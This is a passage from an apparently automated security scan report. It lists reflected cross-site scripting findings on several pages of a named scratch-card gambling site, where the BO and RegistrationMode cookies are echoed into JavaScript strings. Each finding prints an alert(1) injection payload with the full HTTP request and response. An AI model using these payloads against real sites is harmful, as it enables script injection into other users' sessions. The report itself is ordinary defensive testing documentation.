<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM675ff"-alert(1)-"e8312342e57";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.407. http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ad6"-alert(1)-"f8ccb988749 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM31ad6"-alert(1)-"f8ccb988749; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM31ad6"-alert(1)-"f8ccb988749; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM31ad6"-alert(1)-"f8ccb988749";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.408. http://www.scratchcardheaven.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb61"-alert(1)-"98e87135bb9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMcdb61"-alert(1)-"98e87135bb9; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: BO=FMcdb61"-alert(1)-"98e87135bb9; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMcdb61"-alert(1)-"98e87135bb9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.409. http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdccc"-alert(1)-"49cc42fdbd9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMcdccc"-alert(1)-"49cc42fdbd9; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMcdccc"-alert(1)-"49cc42fdbd9; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMcdccc"-alert(1)-"49cc42fdbd9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.410. http://www.scratchcardheaven.com/Home.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fb04"-alert(1)-"0944ce4f5e4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM4fb04"-alert(1)-"0944ce4f5e4; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: BO=FM4fb04"-alert(1)-"0944ce4f5e4; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4fb04"-alert(1)-"0944ce4f5e4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.411. http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 239a6"-alert(1)-"cb8c500f1b0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM239a6"-alert(1)-"cb8c500f1b0; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM239a6"-alert(1)-"cb8c500f1b0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM239a6"-alert(1)-"cb8c500f1b0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.412. http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a06"-alert(1)-"11ff6bc27c7 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMf1a06"-alert(1)-"11ff6bc27c7; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: BO=FMf1a06"-alert(1)-"11ff6bc27c7; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf1a06"-alert(1)-"11ff6bc27c7";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.413. http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67cd9"-alert(1)-"73e69b2fb22 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM67cd9"-alert(1)-"73e69b2fb22; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM67cd9"-alert(1)-"73e69b2fb22; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM67cd9"-alert(1)-"73e69b2fb22";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.414. http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d323d"-alert(1)-"bf06e67383 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMd323d"-alert(1)-"bf06e67383; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: BO=FMd323d"-alert(1)-"bf06e67383; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd323d"-alert(1)-"bf06e67383";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.415. http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba62"-alert(1)-"4327c71e7a3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMaba62"-alert(1)-"4327c71e7a3; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaba62"-alert(1)-"4327c71e7a3; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaba62"-alert(1)-"4327c71e7a3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.416. http://www.scratchcardheaven.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57bb5"-alert(1)-"30552f99443 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM57bb5"-alert(1)-"30552f99443; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
